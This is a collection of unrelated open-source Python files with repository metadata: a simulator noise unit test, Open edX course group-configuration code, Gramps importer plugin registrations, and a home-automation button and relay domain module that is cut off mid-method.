state_2.attributes.get(ATTR_FRIENDLY_NAME)) self.assertEqual('mdi:work', state_2.attributes.get(ATTR_ICON))
mit
echohenry2006/tvb-library
tvb/tests/library/simulator/noise_test.py
3
2676
# -*- coding: utf-8 -*- # # # TheVirtualBrain-Scientific Package. This package holds all simulators, and # analysers necessary to run brain-simulations. You can use it stand alone or # in conjunction with TheVirtualBrain-Framework Package. See content of the # documentation-folder for more details. See also http://www.thevirtualbrain.org # # (c) 2012-2013, Baycrest Centre for Geriatric Care ("Baycrest") # # This program is free software; you can redistribute it and/or modify it under # the terms of the GNU General Public License version 2 as published by the Free # Software Foundation. This program is distributed in the hope that it will be # useful, but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public # License for more details. You should have received a copy of the GNU General # Public License along with this program; if not, you can download it here # http://www.gnu.org/licenses/old-licenses/gpl-2.0 # # # CITATION: # When using The Virtual Brain for scientific publications, please cite it as follows: # # Paula Sanz Leon, Stuart A. Knock, M. Marmaduke Woodman, Lia Domide, # Jochen Mersmann, Anthony R. McIntosh, Viktor Jirsa (2013) # The Virtual Brain: a simulator of primate brain network dynamics. # Frontiers in Neuroinformatics (7:10. doi: 10.3389/fninf.2013.00010) # # """ Test for tvb.simulator.noise module .. moduleauthor:: Paula Sanz Leon <[email protected]> """ if __name__ == "__main__": from tvb.tests.library import setup_test_console_env setup_test_console_env() import unittest from tvb.tests.library.base_testcase import BaseTestCase from tvb.simulator import noise from tvb.datatypes import equations class NoiseTest(BaseTestCase): def test_stream(self): noise_stream = noise.RandomStream() self.assertEqual(noise_stream.init_seed, 42) def test_additive(self): noise_additive = noise.Additive() self.assertEqual(noise_additive.ntau, 0.0) def test_multiplicative(self): noise_multiplicative = noise.Multiplicative() self.assertEqual(noise_multiplicative.ntau, 0.0) self.assertTrue(isinstance(noise_multiplicative.b, equations.Linear)) def suite(): """ Gather all the tests in a test suite. """ test_suite = unittest.TestSuite() test_suite.addTest(unittest.makeSuite(NoiseTest)) return test_suite if __name__ == "__main__": #So you can run tests from this package individually. TEST_RUNNER = unittest.TextTestRunner() TEST_SUITE = suite() TEST_RUNNER.run(TEST_SUITE)
gpl-2.0
iivic/BoiseStateX
cms/djangoapps/contentstore/course_group_config.py
70
13178
""" Class for manipulating groups configuration on a course object. """ import json import logging from util.db import generate_int_id, MYSQL_MAX_INT from django.utils.translation import ugettext as _ from contentstore.utils import reverse_usage_url from xmodule.partitions.partitions import UserPartition from xmodule.split_test_module import get_split_user_partitions from openedx.core.djangoapps.course_groups.partition_scheme import get_cohorted_user_partition MINIMUM_GROUP_ID = 100 RANDOM_SCHEME = "random" COHORT_SCHEME = "cohort" # Note: the following content group configuration strings are not # translated since they are not visible to users. CONTENT_GROUP_CONFIGURATION_DESCRIPTION = 'The groups in this configuration can be mapped to cohort groups in the LMS.' CONTENT_GROUP_CONFIGURATION_NAME = 'Content Group Configuration' log = logging.getLogger(__name__) class GroupConfigurationsValidationError(Exception): """ An error thrown when a group configurations input is invalid. """ pass class GroupConfiguration(object): """ Prepare Group Configuration for the course. """ def __init__(self, json_string, course, configuration_id=None): """ Receive group configuration as a json (`json_string`), deserialize it and validate. """ self.configuration = GroupConfiguration.parse(json_string) self.course = course self.assign_id(configuration_id) self.assign_group_ids() self.validate() @staticmethod def parse(json_string): """ Deserialize given json that represents group configuration. """ try: configuration = json.loads(json_string) except ValueError: raise GroupConfigurationsValidationError(_("invalid JSON")) configuration["version"] = UserPartition.VERSION return configuration def validate(self): """ Validate group configuration representation. """ if not self.configuration.get("name"): raise GroupConfigurationsValidationError(_("must have name of the configuration")) if len(self.configuration.get('groups', [])) < 1: raise GroupConfigurationsValidationError(_("must have at least one group")) def assign_id(self, configuration_id=None): """ Assign id for the json representation of group configuration. """ if configuration_id: self.configuration['id'] = int(configuration_id) else: self.configuration['id'] = generate_int_id( MINIMUM_GROUP_ID, MYSQL_MAX_INT, GroupConfiguration.get_used_ids(self.course) ) def assign_group_ids(self): """ Assign ids for the group_configuration's groups. """ used_ids = [g.id for p in self.course.user_partitions for g in p.groups] # Assign ids to every group in configuration. for group in self.configuration.get('groups', []): if group.get('id') is None: group["id"] = generate_int_id(MINIMUM_GROUP_ID, MYSQL_MAX_INT, used_ids) used_ids.append(group["id"]) @staticmethod def get_used_ids(course): """ Return a list of IDs that already in use. """ return set([p.id for p in course.user_partitions]) def get_user_partition(self): """ Get user partition for saving in course. """ return UserPartition.from_json(self.configuration) @staticmethod def _get_usage_info(course, unit, item, usage_info, group_id, scheme_name=None): """ Get usage info for unit/module. 
""" unit_url = reverse_usage_url( 'container_handler', course.location.course_key.make_usage_key(unit.location.block_type, unit.location.name) ) usage_dict = {'label': u"{} / {}".format(unit.display_name, item.display_name), 'url': unit_url} if scheme_name == RANDOM_SCHEME: validation_summary = item.general_validation_message() usage_dict.update({'validation': validation_summary.to_json() if validation_summary else None}) usage_info[group_id].append(usage_dict) return usage_info @staticmethod def get_content_experiment_usage_info(store, course): """ Get usage information for all Group Configurations currently referenced by a split_test instance. """ split_tests = store.get_items(course.id, qualifiers={'category': 'split_test'}) return GroupConfiguration._get_content_experiment_usage_info(store, course, split_tests) @staticmethod def get_split_test_partitions_with_usage(store, course): """ Returns json split_test group configurations updated with usage information. """ usage_info = GroupConfiguration.get_content_experiment_usage_info(store, course) configurations = [] for partition in get_split_user_partitions(course.user_partitions): configuration = partition.to_json() configuration['usage'] = usage_info.get(partition.id, []) configurations.append(configuration) return configurations @staticmethod def _get_content_experiment_usage_info(store, course, split_tests): # pylint: disable=unused-argument """ Returns all units names, their urls and validation messages. Returns: {'user_partition_id': [ { 'label': 'Unit 1 / Experiment 1', 'url': 'url_to_unit_1', 'validation': {'message': 'a validation message', 'type': 'warning'} }, { 'label': 'Unit 2 / Experiment 2', 'url': 'url_to_unit_2', 'validation': {'message': 'another validation message', 'type': 'error'} } ], } """ usage_info = {} for split_test in split_tests: if split_test.user_partition_id not in usage_info: usage_info[split_test.user_partition_id] = [] unit = split_test.get_parent() if not unit: log.warning("Unable to find parent for split_test %s", split_test.location) continue usage_info = GroupConfiguration._get_usage_info( course=course, unit=unit, item=split_test, usage_info=usage_info, group_id=split_test.user_partition_id, scheme_name=RANDOM_SCHEME ) return usage_info @staticmethod def get_content_groups_usage_info(store, course): """ Get usage information for content groups. """ items = store.get_items(course.id, settings={'group_access': {'$exists': True}}) return GroupConfiguration._get_content_groups_usage_info(course, items) @staticmethod def _get_content_groups_usage_info(course, items): """ Returns all units names and their urls. This will return only groups for the cohort user partition. Returns: {'group_id': [ { 'label': 'Unit 1 / Problem 1', 'url': 'url_to_unit_1' }, { 'label': 'Unit 2 / Problem 2', 'url': 'url_to_unit_2' } ], } """ usage_info = {} for item, group_id in GroupConfiguration._iterate_items_and_content_group_ids(course, items): if group_id not in usage_info: usage_info[group_id] = [] unit = item.get_parent() if not unit: log.warning("Unable to find parent for component %s", item.location) continue usage_info = GroupConfiguration._get_usage_info( course, unit=unit, item=item, usage_info=usage_info, group_id=group_id ) return usage_info @staticmethod def get_content_groups_items_usage_info(store, course): """ Get usage information on items for content groups. 
""" items = store.get_items(course.id, settings={'group_access': {'$exists': True}}) return GroupConfiguration._get_content_groups_items_usage_info(course, items) @staticmethod def _get_content_groups_items_usage_info(course, items): """ Returns all items names and their urls. This will return only groups for the cohort user partition. Returns: {'group_id': [ { 'label': 'Problem 1 / Problem 1', 'url': 'url_to_item_1' }, { 'label': 'Problem 2 / Problem 2', 'url': 'url_to_item_2' } ], } """ usage_info = {} for item, group_id in GroupConfiguration._iterate_items_and_content_group_ids(course, items): if group_id not in usage_info: usage_info[group_id] = [] usage_info = GroupConfiguration._get_usage_info( course, unit=item, item=item, usage_info=usage_info, group_id=group_id ) return usage_info @staticmethod def _iterate_items_and_content_group_ids(course, items): """ Iterate through items and content group IDs in a course. This will yield group IDs *only* for cohort user partitions. Yields: tuple of (item, group_id) """ content_group_configuration = get_cohorted_user_partition(course) if content_group_configuration is not None: for item in items: if hasattr(item, 'group_access') and item.group_access: group_ids = item.group_access.get(content_group_configuration.id, []) for group_id in group_ids: yield item, group_id @staticmethod def update_usage_info(store, course, configuration): """ Update usage information for particular Group Configuration. Returns json of particular group configuration updated with usage information. """ configuration_json = None # Get all Experiments that use particular Group Configuration in course. if configuration.scheme.name == RANDOM_SCHEME: split_tests = store.get_items( course.id, category='split_test', content={'user_partition_id': configuration.id} ) configuration_json = configuration.to_json() usage_information = GroupConfiguration._get_content_experiment_usage_info(store, course, split_tests) configuration_json['usage'] = usage_information.get(configuration.id, []) elif configuration.scheme.name == COHORT_SCHEME: # In case if scheme is "cohort" configuration_json = GroupConfiguration.update_content_group_usage_info(store, course, configuration) return configuration_json @staticmethod def update_content_group_usage_info(store, course, configuration): """ Update usage information for particular Content Group Configuration. Returns json of particular content group configuration updated with usage information. """ usage_info = GroupConfiguration.get_content_groups_usage_info(store, course) content_group_configuration = configuration.to_json() for group in content_group_configuration['groups']: group['usage'] = usage_info.get(group['id'], []) return content_group_configuration @staticmethod def get_or_create_content_group(store, course): """ Returns the first user partition from the course which uses the CohortPartitionScheme, or generates one if no such partition is found. The created partition is not saved to the course until the client explicitly creates a group within the partition and POSTs back. 
""" content_group_configuration = get_cohorted_user_partition(course) if content_group_configuration is None: content_group_configuration = UserPartition( id=generate_int_id(MINIMUM_GROUP_ID, MYSQL_MAX_INT, GroupConfiguration.get_used_ids(course)), name=CONTENT_GROUP_CONFIGURATION_NAME, description=CONTENT_GROUP_CONFIGURATION_DESCRIPTION, groups=[], scheme_id=COHORT_SCHEME ) return content_group_configuration.to_json() content_group_configuration = GroupConfiguration.update_content_group_usage_info( store, course, content_group_configuration ) return content_group_configuration
agpl-3.0
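A short sketch (illustrative values) of the JSON that GroupConfiguration accepts: per parse() and validate() above, "name" is required and "groups" needs at least one entry, while missing group ids are filled in by assign_group_ids(). The `course` object is assumed to be an existing course descriptor exposing user_partitions.

import json

payload = json.dumps({
    "name": "Experiment Group Configuration",
    "description": "Groups for a split_test experiment",
    "groups": [
        {"name": "Group A"},   # ids are optional; assign_group_ids() generates them
        {"name": "Group B"},
    ],
})

configuration = GroupConfiguration(payload, course)   # parses, assigns ids, validates
# Invalid input (e.g. an empty "groups" list) raises GroupConfigurationsValidationError.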
Fedik/gramps
gramps/plugins/importer/import.gpr.py
4
5381
# # Gramps - a GTK+/GNOME based genealogy program # # Copyright (C) 2009 Benny Malengier # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. # from gramps.gen.plug._pluginreg import newplugin, STABLE, IMPORT from gramps.gen.const import GRAMPS_LOCALE as glocale _ = glocale.translation.gettext MODULE_VERSION="5.2" #------------------------------------------------------------------------ # # Comma _Separated Values Spreadsheet (CSV) # #------------------------------------------------------------------------ _mime_type = "text/x-comma-separated-values" # CSV Document _mime_type_rfc_4180 = "text/csv" # CSV Document See rfc4180 for mime type plg = newplugin() plg.id = 'im_csv' plg.name = _("Comma Separated Values Spreadsheet (CSV)") plg.description = _("Import data from CSV files") plg.version = '1.0' plg.gramps_target_version = MODULE_VERSION plg.status = STABLE plg.fname = 'importcsv.py' plg.ptype = IMPORT plg.import_function = 'importData' plg.extension = "csv" #------------------------------------------------------------------------ # # GEDCOM # #------------------------------------------------------------------------ plg = newplugin() plg.id = 'im_ged' plg.name = _('GEDCOM') plg.description = _('GEDCOM is used to transfer data between genealogy programs. 
' 'Most genealogy software will accept a GEDCOM file as input.') plg.version = '1.0' plg.gramps_target_version = MODULE_VERSION plg.status = STABLE plg.fname = 'importgedcom.py' plg.ptype = IMPORT plg.import_function = 'importData' plg.extension = "ged" #------------------------------------------------------------------------ # # Geneweb # #------------------------------------------------------------------------ plg = newplugin() plg.id = 'im_geneweb' plg.name = _('GeneWeb') plg.description = _('Import data from GeneWeb files') plg.version = '1.0' plg.gramps_target_version = MODULE_VERSION plg.status = STABLE plg.fname = 'importgeneweb.py' plg.ptype = IMPORT plg.import_function = 'importData' plg.extension = "gw" #------------------------------------------------------------------------ # # Gramps package (portable XML) # #------------------------------------------------------------------------ plg = newplugin() plg.id = 'im_gpkg' plg.name = _('Gramps package (portable XML)') plg.description = _('Import data from a Gramps package (an archived XML ' 'Family Tree together with the media object files.)') plg.version = '1.0' plg.gramps_target_version = MODULE_VERSION plg.status = STABLE plg.fname = 'importgpkg.py' plg.ptype = IMPORT plg.import_function = 'impData' plg.extension = "gpkg" #------------------------------------------------------------------------ # # Gramps XML database # #------------------------------------------------------------------------ plg = newplugin() plg.id = 'im_gramps' plg.name = _('Gramps XML Family Tree') plg.description = _('The Gramps XML format is a text ' 'version of a Family Tree. It is ' 'read-write compatible with the ' 'present Gramps database format.') plg.version = '1.0' plg.gramps_target_version = MODULE_VERSION plg.status = STABLE plg.fname = 'importxml.py' plg.ptype = IMPORT plg.import_function = 'importData' plg.extension = "gramps" #------------------------------------------------------------------------ # # GRDB database # #------------------------------------------------------------------------ plg = newplugin() plg.id = 'im_grdb' plg.name = _('Gramps 2.x database') plg.description = _('Import data from Gramps 2.x database files') plg.version = '1.0' plg.gramps_target_version = MODULE_VERSION plg.status = STABLE plg.fname = 'importgrdb.py' plg.ptype = IMPORT plg.import_function = 'importData' plg.extension = "grdb" #------------------------------------------------------------------------ # # Pro-Gen Files # #------------------------------------------------------------------------ plg = newplugin() plg.id = 'im_progen' plg.name = _('Pro-Gen') plg.description = _('Import data from Pro-Gen files') plg.version = '1.0' plg.gramps_target_version = MODULE_VERSION plg.status = STABLE plg.fname = 'importprogen.py' plg.ptype = IMPORT plg.import_function = '_importData' plg.extension = "def" #------------------------------------------------------------------------ # # vCard # #------------------------------------------------------------------------ plg = newplugin() plg.id = 'im_vcard' plg.name = _('vCard') plg.description = _('Import data from vCard files') plg.version = '1.0' plg.gramps_target_version = MODULE_VERSION plg.status = STABLE plg.fname = 'importvcard.py' plg.ptype = IMPORT plg.import_function = 'importData' plg.extension = "vcf"
gpl-2.0
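A sketch of how one more importer would be registered, following exactly the pattern of the entries above; the plugin id, module name and extension below are hypothetical placeholders.

plg = newplugin()
plg.id = 'im_example'
plg.name = _('Example format')
plg.description = _('Import data from Example files')
plg.version = '1.0'
plg.gramps_target_version = MODULE_VERSION
plg.status = STABLE
plg.fname = 'importexample.py'   # module that defines the import function
plg.ptype = IMPORT
plg.import_function = 'importData'
plg.extension = "xyz"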
deklungel/iRulez
src/button/_domain.py
1
29130
from enum import IntEnum import src.irulez.util as util from abc import ABC, abstractmethod import src.irulez.log as log from datetime import time from typing import List, Dict, Optional import src.irulez.constants as constants from threading import Timer logger = log.get_logger('button_domain') class ArduinoPinType(IntEnum): """Represents the purpose of a pin on an arduino""" BUTTON = 1 OUTPUT = 2 DIMMER = 3 class ActionType(IntEnum): """Represents what should happen. Toggle --> Relay H <-> L, On --> Relay H, Off --> Relay L, Follow_Button --> when button pressed -> relay H, dimmer --> dimmer""" TOGGLE = 1 ON = 2 OFF = 3 FOLLOW_BUTTON = 4 ON_DIMMER = 5 OFF_DIMMER = 6 TOGGLE_DIMMER = 7 class ActionTriggerType(IntEnum): """Represents when a action need to be executed""" IMMEDIATELY = 1 AFTER_RELEASE = 2 LONG_DOWN = 3 class Operator(IntEnum): AND = 1 OR = 2 class ConditionType(IntEnum): LIST = 1 OUTPUT_PIN = 2 TIME = 3 class ActionTrigger(ABC): def __init__(self, trigger_type: ActionTriggerType): self.trigger_type = trigger_type def get_action_trigger_type(self) -> ActionTriggerType: return self.trigger_type class Condition(ABC): def __init__(self, condition_type: ConditionType): self.condition_type = condition_type class Notification(ABC): def __init__(self, message: str, enabled: False): self.message = message self.enabled = enabled @abstractmethod def get_topic_name(self) -> str: pass @abstractmethod def get_payload(self) -> str: pass class ImmediatelyActionTrigger(ActionTrigger): def __init__(self) -> None: super(ImmediatelyActionTrigger, self).__init__(ActionTriggerType.IMMEDIATELY) class AfterReleaseActionTrigger(ActionTrigger): def __init__(self) -> None: super(AfterReleaseActionTrigger, self).__init__(ActionTriggerType.AFTER_RELEASE) class LongDownActionTrigger(ActionTrigger): def __init__(self, seconds_down: int): super(LongDownActionTrigger, self).__init__(ActionTriggerType.LONG_DOWN) self._seconds_down = seconds_down @property def seconds_down(self) -> int: return self._seconds_down class Pin(ABC): """Represents a pin on an arduino""" def __init__(self, number: int, pin_type: ArduinoPinType, state=False): self.number = number self.pin_type = pin_type self.state = state class OutputPin(Pin): """Represents a single pin on an arduino""" def __init__(self, number: int, parent: str, state=False): """ Creates a new output pin :param number: number of this pin on the given arduino :param parent: name of the arduino :param state: Initial state """ super(OutputPin, self).__init__(number, ArduinoPinType.OUTPUT, state) self.parent = parent class IndividualAction: """Represents the actions on pins that have to happen on a single arduino""" def __init__(self, delay: int, pin_numbers_on: List[int], pin_numbers_off: List[int]): self.delay = delay self.pin_numbers_on = pin_numbers_on self.pin_numbers_off = pin_numbers_off def add_pin_on(self, pin_number: int): self.pin_numbers_on.append(pin_number) def add_pin_off(self, pin_number: int): self.pin_numbers_off.append(pin_number) def has_values_on(self) -> bool: if len(self.pin_numbers_on) > 0: return True return False def has_values_off(self) -> bool: if len(self.pin_numbers_off) > 0: return True return False class IndividualDimAction: """Represents a dimmer action for a single arduino""" def __init__(self, dim_speed: int, dim_light_value: int, delay: int, cancel_on_button_release: bool): self.__speed = dim_speed self.__dim_light_value = dim_light_value self.__delay = delay self.__pin_numbers = [] self.__cancel_on_button_release = 
cancel_on_button_release def add_pin(self, pin_number: int): self.__pin_numbers.append(pin_number) def has_values(self) -> bool: if len(self.__pin_numbers) > 0: return True return False @property def speed(self) -> int: return self.__speed @property def dim_light_value(self) -> int: """The value the pins should go to""" return self.__dim_light_value @property def delay(self) -> int: return self.__delay @property def pin_numbers(self) -> List[int]: return self.__pin_numbers @property def cancel_on_button_release(self) -> bool: return self.__cancel_on_button_release class Action(ABC): """Represents a single action""" def __init__(self, trigger: ActionTrigger, action_type: ActionType, delay: int, output_pins: List[OutputPin], notifications: List[Notification], condition: Optional[Condition], click_number: int): self.trigger = trigger self.action_type = action_type self.delay = delay self.output_pins = output_pins self.notifications = notifications self.condition = condition self.click_number = click_number def get_condition(self) -> Condition: return self.condition class DimmerAction(Action): """Represents a single dimmer action""" def __init__(self, trigger: ActionTrigger, action_type: ActionType, delay: int, output_pins: List[OutputPin], notifications: List[Notification], condition: Optional[Condition], click_number: int, dimmer_speed: int, cancel_on_button_release: bool): super(DimmerAction, self).__init__(trigger, action_type, delay, output_pins, notifications, condition, click_number) self._dimmer_speed = dimmer_speed self._cancel_on_button_release = cancel_on_button_release @property def cancel_on_button_release(self) -> bool: return self._cancel_on_button_release class ButtonPin(Pin): """Represents a single input pin on an arduino""" def __init__(self, number: int, actions: List[Action], time_between_clicks, state=False): self.__actions = actions self.__long_down_timer = None self.__multi_click_timer = None self.__longdown_executed = False self.__time_between_clicks = time_between_clicks self.__clicks = 0 self.__dimmer_direction = True super(ButtonPin, self).__init__(number, ArduinoPinType.BUTTON, state) def get_button_immediate_actions(self) -> List[Action]: results = [] for action in self.actions: if action.trigger.trigger_type == ActionTriggerType.IMMEDIATELY and self.clicks == action.click_number: results.append(action) return results def get_button_after_release_actions(self) -> List[Action]: results = [] for action in self.actions: if action.trigger.trigger_type == ActionTriggerType.AFTER_RELEASE and self.clicks == action.click_number: results.append(action) return results def get_smallest_longdown_time(self, minimum_time: int) -> Optional[int]: longdown_time = None for action in self.actions: if action.click_number == self.clicks and action.trigger.trigger_type == ActionTriggerType.LONG_DOWN and \ isinstance(action.trigger, LongDownActionTrigger): if longdown_time is None and action.trigger.seconds_down > minimum_time: longdown_time = action.trigger.seconds_down elif action.trigger.seconds_down > minimum_time: longdown_time = action.trigger.seconds_down return longdown_time def get_button_long_down_actions(self, seconds_down: int) -> List[Action]: results = [] for action in self.actions: if action.trigger.trigger_type == ActionTriggerType.LONG_DOWN and \ action.trigger.seconds_down == seconds_down and isinstance(action.trigger, LongDownActionTrigger): results.append(action) return results def has_cancellable_dimmer_actions(self) -> bool: for action in self.actions: if 
isinstance(action, DimmerAction) and action.cancel_on_button_release: return True return False def has_multi_click_actions(self, minimum_click: int) -> bool: for action in self.actions: if minimum_click <= action.click_number > 1: return True return False def start_long_down_timer(self, interval: int, function, args: List[object]): logger.debug(f"Start long down timer") self.__long_down_timer = Timer(interval, function, args=(args,)) self.__long_down_timer.start() def stop_long_down_timer(self) -> None: logger.debug(f"Stop long down timer") self.__long_down_timer.cancel() self.__long_down_timer = None def start_multi_click_timer(self, interval: int, function, args: List[object]): logger.debug(f"Start multi click timer") self.__multi_click_timer = Timer(interval, function, args=(args,)) self.__multi_click_timer.start() def stop_multi_click_timer(self) -> None: logger.debug(f"Stop multi click timer") self.__multi_click_timer.cancel() self.__multi_click_timer = None def reverse_dimmer_direction(self) -> None: self.__dimmer_direction = not self.dimmer_direction @property def multi_click_timer(self) -> Timer: return self.__multi_click_timer @property def dimmer_direction(self) -> bool: return self.__dimmer_direction @dimmer_direction.setter def dimmer_direction(self, dimmer_direction: bool): self.__dimmer_direction = dimmer_direction @property def time_between_clicks(self) -> float: return self.__time_between_clicks @property def long_down_timer(self) -> Timer: return self.__long_down_timer @long_down_timer.setter def long_down_timer(self, long_down_timer: Timer): self.__long_down_timer = long_down_timer @property def clicks(self) -> int: return self.__clicks @clicks.setter def clicks(self, clicks: int): self.__clicks = clicks @property def actions(self) -> List[Action]: return self.__actions @property def longdown_executed(self) -> bool: return self.__longdown_executed @longdown_executed.setter def longdown_executed(self, longdown_executed: bool): self.__longdown_executed = longdown_executed class Arduino: """Represents an actual arduino""" def __init__(self, name: str, number_of_outputs_pins: int, number_of_button_pins: int): self.name = name self.number_of_output_pins = number_of_outputs_pins self.number_of_button_pins = number_of_button_pins self.__output_pins = dict() self._button_pins = dict() @property def button_pins(self) -> Dict[int, ButtonPin]: return self._button_pins @property def output_pins(self) -> Dict[int, OutputPin]: return self.__output_pins def set_output_pin(self, output_pin: OutputPin): self.output_pins[output_pin.number] = output_pin def set_output_pins(self, output_pins: List[OutputPin]): for pin in output_pins: self.output_pins[pin.number] = pin def set_button_pin(self, button_pin: ButtonPin): self._button_pins[button_pin.number] = button_pin def set_button_pins(self, button_pins: List[ButtonPin]): for pin in button_pins: self._button_pins[pin.number] = pin def get_output_pin(self, pin_number: int) -> OutputPin: return self.output_pins[pin_number] def get_changed_pins(self, payload: str) -> Dict[int, bool]: status = util.convert_hex_to_array(payload, self.number_of_output_pins) changed_pins = dict() for pin in self._button_pins.values(): if bool(int(status[pin.number])) != pin.state: changed_pins[pin.number] = bool(int(status[pin.number])) pin.state = bool(int(status[pin.number])) return changed_pins class IndividualRealTimeDimAction(IndividualAction): """Represents a dimmer action for a single arduino""" def __init__(self, dim_speed: int, dim_light_value: int, delay: 
int, pin_numbers_on: List[int], pin_numbers_off: List[int], arduino: Arduino, button: ButtonPin): super(IndividualAction).__init__(delay, pin_numbers_on, pin_numbers_off) self.speed = dim_speed self.dim_light_value = dim_light_value self.arduino = arduino self.button = button class MailNotification(Notification): def __init__(self, message: str, subject: str, mails: List[str], enabled=False): super(MailNotification, self).__init__(message, enabled) self.mails = mails self.subject = subject def get_topic_name(self) -> str: return constants.iRulezTopic + "/" + constants.notificationTopic + "/" + constants.mailTopic def get_payload(self) -> str: return util.serialize_json( { "mails": self.mails, "message": self.message, "subject": self.subject }) class TelegramNotification(Notification): def __init__(self, message: str, tokens: List[str], enabled=False): super(TelegramNotification, self).__init__(message, enabled) self.tokens = tokens def get_topic_name(self) -> str: return constants.iRulezTopic + "/" + constants.notificationTopic + "/" + constants.telegramTopic def get_payload(self) -> str: return util.serialize_json( { "tokens": self.tokens, "message": self.message }) class ConditionList(Condition): def __init__(self, operator: Operator, conditions: List[Condition]): super(ConditionList, self).__init__(ConditionType.LIST) self.operator = operator self.conditions = conditions class OutputPinCondition(Condition): def __init__(self, output_pin: OutputPin, status: bool): super(OutputPinCondition, self).__init__(ConditionType.OUTPUT_PIN) self.output_pin = output_pin self.status = status class TimeCondition(Condition): def __init__(self, from_time: time, to_time: time): super(TimeCondition, self).__init__(ConditionType.TIME) self.from_time = from_time self.to_time = to_time class OnAction(Action): def __init__(self, trigger: ActionTrigger, delay: int, off_timer: int, output_pins: List[OutputPin], notifications: List[Notification], condition: Optional[Condition], click_number: int): self.off_timer = off_timer super(OnAction, self).__init__(trigger, ActionType.ON, delay, output_pins, notifications, condition, click_number) def perform_action(self, pins_to_switch: Dict[str, List[IndividualAction]]): temp_pin_actions = {} for pin in self.output_pins: if pin.parent not in temp_pin_actions: pin_action = IndividualAction(self.delay, [], []) pin_action.add_pin_on(pin.number) temp_pin_actions[pin.parent] = pin_action else: temp_pin_actions[pin.parent].add_pin_on(pin.number) for key in temp_pin_actions: if temp_pin_actions[key].has_values_on(): pins_to_switch.setdefault(key, []).append(temp_pin_actions[key]) if self.off_timer > 0: for pin in self.output_pins: if pin.parent not in temp_pin_actions: pin_action = IndividualAction(self.off_timer, [], []) pin_action.add_pin_off(pin.number) temp_pin_actions[pin.parent] = pin_action else: temp_pin_actions[pin.parent].add_pin_off(pin.number) for key in temp_pin_actions: if temp_pin_actions[key].has_values_off(): pins_to_switch.setdefault(key, []).append(temp_pin_actions[key]) class OffAction(Action): def __init__(self, trigger: ActionTrigger, delay: int, on_timer: int, output_pins: List[OutputPin], notifications: List[Notification], condition: Optional[Condition], click_number: int): self.on_timer = on_timer super(OffAction, self).__init__(trigger, ActionType.OFF, delay, output_pins, notifications, condition, click_number) def perform_action(self, pins_to_switch: Dict[str, List[IndividualAction]]): temp_pin_actions = {} for pin in self.output_pins: if pin.parent 
not in temp_pin_actions: pin_action = IndividualAction(self.delay, [], []) pin_action.add_pin_off(pin.number) temp_pin_actions[pin.parent] = pin_action else: temp_pin_actions[pin.parent].add_pin_off(pin.number) for key in temp_pin_actions: if temp_pin_actions[key].has_values_off(): pins_to_switch.setdefault(key, []).append(temp_pin_actions[key]) if self.on_timer > 0: for pin in self.output_pins: if pin.parent not in temp_pin_actions: pin_action = IndividualAction(self.on_timer, [], []) pin_action.add_pin_on(pin.number) temp_pin_actions[pin.parent] = pin_action else: temp_pin_actions[pin.parent].add_pin_on(pin.number) for key in temp_pin_actions: if temp_pin_actions[key].has_values_on(): pins_to_switch.setdefault(key, []).append(temp_pin_actions[key]) class ToggleAction(Action): def __init__(self, trigger: ActionTrigger, delay: int, output_pins: List[OutputPin], notifications: List[Notification], master: OutputPin, condition: Optional[Condition], click_number: int): super(ToggleAction, self).__init__(trigger, ActionType.TOGGLE, delay, output_pins, notifications, condition, click_number) self.master = master def perform_action(self, pins_to_switch: Dict[str, List[IndividualAction]], master: bool): # if master is on put all the lights of and visa versa temp_pin_actions = {} if master: for pin in self.output_pins: if pin.parent not in temp_pin_actions: pin_action = IndividualAction(self.delay, [], []) pin_action.add_pin_off(pin.number) temp_pin_actions[pin.parent] = pin_action else: temp_pin_actions[pin.parent].add_pin_off(pin.number) for key in temp_pin_actions: if temp_pin_actions[key].has_values_off(): pins_to_switch.setdefault(key, []).append(temp_pin_actions[key]) else: for pin in self.output_pins: if pin.parent not in temp_pin_actions: pin_action = IndividualAction(self.delay, [], []) pin_action.add_pin_on(pin.number) temp_pin_actions[pin.parent] = pin_action else: temp_pin_actions[pin.parent].add_pin_on(pin.number) for key in temp_pin_actions: if temp_pin_actions[key].has_values_on(): pins_to_switch.setdefault(key, []).append(temp_pin_actions[key]) class OnDimmerAction(DimmerAction): def __init__(self, trigger: ActionTrigger, delay: int, off_timer: int, output_pins: List[OutputPin], notifications: List[Notification], condition: Optional[Condition], click_number: int, dimmer_speed: int, dimmer_light_value: int, cancel_on_button_release: bool, master_dim_id: int): self.__off_timer = off_timer self.__dimmer_light_value = dimmer_light_value self.__master_dim_id = master_dim_id super(OnDimmerAction, self).__init__(trigger, ActionType.ON_DIMMER, delay, output_pins, notifications, condition, click_number, dimmer_speed, cancel_on_button_release) def perform_action(self, pin_to_dim: Dict[str, List[IndividualDimAction]]): temp_pin_actions = {} for pin in self.output_pins: if pin.parent not in temp_pin_actions: if self.__dimmer_light_value is None: self.__dimmer_light_value = 100 pin_action = IndividualDimAction(self._dimmer_speed, self.__dimmer_light_value, self.delay, self._cancel_on_button_release) pin_action.add_pin(pin.number) temp_pin_actions[pin.parent] = pin_action else: temp_pin_actions[pin.parent].add_pin(pin.number) for key in temp_pin_actions: if temp_pin_actions[key].has_values(): pin_to_dim.setdefault(key, []).append(temp_pin_actions[key]) if self.__off_timer > 0: for pin in self.output_pins: if pin.parent not in temp_pin_actions: pin_action = IndividualDimAction(self._dimmer_speed, 0, self.__off_timer, self._cancel_on_button_release) pin_action.add_pin(pin.number) 
